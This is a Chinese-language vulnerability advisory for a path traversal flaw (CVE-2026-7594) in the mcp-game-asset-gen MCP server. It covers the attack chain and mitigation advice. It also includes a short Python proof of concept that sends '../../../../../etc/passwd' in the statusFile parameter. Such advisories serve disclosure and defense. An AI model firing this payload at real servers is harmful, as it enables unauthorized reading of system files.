CVE-2026-7594 CVSS 7.3 高危

CVE-2026-7594: mcp-game-asset-gen路径遍历漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7594

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Flux159 mcp-game-asset-gen

漏洞概述

Flux159 mcp-game-asset-gen 0.1.0版本中存在路径遍历漏洞。该漏洞位于组件MCP Interface的src/index.ts文件的image_to_3d_async函数中。由于对参数statusFile的处理不当，攻击者无需认证即可远程利用此漏洞，操纵文件路径，可能导致敏感信息泄露或文件篡改。目前漏洞细节已公开，且厂商尚未回应。

技术细节

该漏洞源于Flux159 mcp-game-asset-gen项目中image_to_3d_async函数对用户输入的验证缺失。在处理statusFile参数时，程序未对路径字符串进行有效的过滤或规范化（如未检查../序列），导致攻击者能够构造特殊的恶意输入。通过操纵该参数，攻击者可以利用目录遍历技术访问或修改应用程序预期目录之外的文件。攻击向量为网络（AV:N），无需用户交互（UI:N）且无需任何权限（PR:N），这使得利用门槛较低。

攻击链分析

STEP 1

1. 侦察阶段

攻击者识别出目标运行Flux159 mcp-game-asset-gen 0.1.0版本，并确认其暴露了MCP接口。

STEP 2

2. 漏洞利用

攻击者构造包含路径遍历序列（如../）的恶意请求，发送至image_to_3d_async函数的statusFile参数。

STEP 3

3. 执行攻击

服务器端未对输入进行过滤，直接处理恶意路径参数，导致攻击者读取或写入预期目录之外的文件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL example
target_url = "http://target-host:port/api/image_to_3d_async"

# Malicious payload using path traversal
payload = {
    "statusFile": "../../../../../etc/passwd"  # Attempting to read sensitive files
}

try:
    # Send POST request with the malicious payload
    response = requests.post(target_url, data=payload)
    
    if response.status_code == 200:
        print("Exploit successful! Response content:")
        print(response.text)
    else:
        print(f"Exploit failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

Flux159 mcp-game-asset-gen 0.1.0

防御指南

临时缓解措施

由于厂商尚未发布补丁，建议在WAF或反向代理层添加规则，拦截包含路径遍历字符（如../、..\）的请求。同时，应限制服务器的文件读写权限，确保应用进程仅能访问必要的目录，防止敏感文件被非法访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7594
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7594
3 Details https://www.cvedetails.com/cve/CVE-2026-7594/
4 VulDB https://vuldb.com/cve/CVE-2026-7594
5 Link https://github.com/Flux159/mcp-game-asset-gen/
6 Link https://github.com/Flux159/mcp-game-asset-gen/issues/3
7 Link https://vuldb.com/submit/805508
8 Link https://vuldb.com/vuln/360547
9 Link https://vuldb.com/vuln/360547/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表